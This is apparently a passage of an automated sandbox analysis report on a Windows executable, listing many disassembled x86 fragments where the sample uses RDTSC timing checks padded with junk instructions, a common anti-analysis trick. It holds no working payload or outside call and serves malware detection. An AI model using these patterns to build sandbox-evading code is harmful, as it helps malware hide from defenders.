                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC4E21 second address: CC4E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC4E27 second address: CC4E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F885CC87016h 0x0000000a popad 0x0000000b pop esi 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F885CC87016h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC4E3C second address: CC4E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC88CE second address: CC88D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8A1C second address: CC8A46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97CA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F885CB97CBBh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F885CB97C9Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8A46 second address: CC8A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD0406 second address: CD040F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD040F second address: CD0419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F885CC87016h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD0419 second address: CD0432 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97CA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD0432 second address: CD0448 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F885CC87018h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e jns 00007F885CC87016h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCE645 second address: CCE64B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCE64B second address: CCE655 instructions: 0x00000000 rdtsc 0x00000002 js 00007F885CC87016h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCF513 second address: CCF51D instructions: 0x00000000 rdtsc 0x00000002 je 00007F885CB97C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCF51D second address: CCF527 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F885CC8701Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCF527 second address: CCF543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F885CB97C9Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F885CB97C96h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCF543 second address: CCF547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCFAB1 second address: CCFAB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCFAB8 second address: CCFAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD009F second address: CD00A9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F885CB97C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD00A9 second address: CD00AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD00AF second address: CD00C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F885CB97C9Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD00C0 second address: CD00CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD00CE second address: CD00D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD00D2 second address: CD00EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F885CC87020h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD00EE second address: CD00F8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F885CB97C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD00F8 second address: CD0109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC8701Ch 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD586C second address: CD5897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB97CA0h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F885CB97CA1h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD5897 second address: CD589F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD94B5 second address: CD94C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jng 00007F885CB97C96h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD94C7 second address: CD94CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD94CD second address: CD94D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F885CB97C96h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD86D3 second address: CD86FF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F885CC87016h 0x00000008 jne 00007F885CC87016h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F885CC87022h 0x00000015 popad 0x00000016 jnl 00007F885CC8702Eh 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD86FF second address: CD8705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8705 second address: CD870E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8AFB second address: CD8B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8B01 second address: CD8B10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC8701Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD91BF second address: CD920A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB97CA8h 0x00000009 push ecx 0x0000000a jmp 00007F885CB97CA4h 0x0000000f pop ecx 0x00000010 popad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007F885CB97C96h 0x0000001a jmp 00007F885CB97C9Fh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEFA7 second address: CDEFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF118 second address: CDF12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 ja 00007F885CB97C9Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF12F second address: CDF133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF133 second address: CDF176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F885CB97C96h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F885CB97CA8h 0x00000014 jmp 00007F885CB97CA6h 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF176 second address: CDF195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F885CC87026h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF195 second address: CDF199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF199 second address: CDF19F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF5B6 second address: CDF5BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF756 second address: CDF76A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F885CC87016h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF76A second address: CDF774 instructions: 0x00000000 rdtsc 0x00000002 js 00007F885CB97C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF774 second address: CDF77B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFA4E second address: CDFA8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97CA0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F885CB97CA3h 0x0000000e jmp 00007F885CB97CA6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFBEB second address: CDFC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F885CC87016h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F885CC87025h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFD3A second address: CDFD44 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F885CB97C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE05D0 second address: CE05D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0CBF second address: CE0CC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0CC5 second address: CE0CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F885CC8701Ch 0x0000000c jng 00007F885CC87016h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0CD7 second address: CE0CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0CDD second address: CE0CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB488 second address: CEB4B2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F885CB97C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jnl 00007F885CB97CBFh 0x00000011 push edx 0x00000012 jmp 00007F885CB97C9Dh 0x00000017 jne 00007F885CB97C96h 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB4B2 second address: CEB4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB152 second address: CEB156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF38A6 second address: CF38C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F885CC87016h 0x0000000c jmp 00007F885CC87027h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF38C9 second address: CF38E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F885CB97C9Eh 0x0000000e push edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF38E5 second address: CF38EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF38EA second address: CF3923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F885CB97C96h 0x00000009 jmp 00007F885CB97CA3h 0x0000000e jmp 00007F885CB97CA8h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3923 second address: CF3927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD84D second address: CFD853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD853 second address: CFD864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CC8701Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD864 second address: CFD868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02660 second address: D0266B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0266B second address: D02671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D06DC0 second address: D06DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D06DC6 second address: D06DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D06DCB second address: D06DD0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E365 second address: D0E36B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E36B second address: D0E37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F885CC8701Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E37F second address: D0E385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15ACA second address: D15AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC87029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15AE7 second address: D15AED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15AED second address: D15AF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15DD1 second address: D15DF2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F885CB97C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F885CB97C9Dh 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F885CB97C96h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15DF2 second address: D15E06 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F885CC87016h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F885CC87016h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D164D9 second address: D164DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D164DD second address: D164E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D164E3 second address: D164F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007F885CB97C96h 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16EC3 second address: D16EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F885CC87029h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19E1D second address: D19E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19A26 second address: D19A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CC87022h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1EF0C second address: D1EF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F885CB97CADh 0x0000000b jmp 00007F885CB97CA7h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32FDE second address: D32FE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47AF8 second address: D47AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47AFE second address: D47B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47B04 second address: D47B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB97CA2h 0x00000009 popad 0x0000000a jno 00007F885CB97C98h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47B23 second address: D47B28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46B37 second address: D46B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46B40 second address: D46B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46E3C second address: D46E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FC0 second address: D46FC5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FC5 second address: D46FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47503 second address: D47507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47507 second address: D4750D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4763D second address: D47643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47643 second address: D4767B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F885CB97C9Ah 0x0000000a pop esi 0x0000000b push ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007F885CB97C96h 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007F885CB97CA8h 0x0000001c popad 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D477B7 second address: D477BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4922B second address: D49231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BB8B second address: D4BB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BB8F second address: D4BB95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BE5A second address: D4BE68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC8701Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
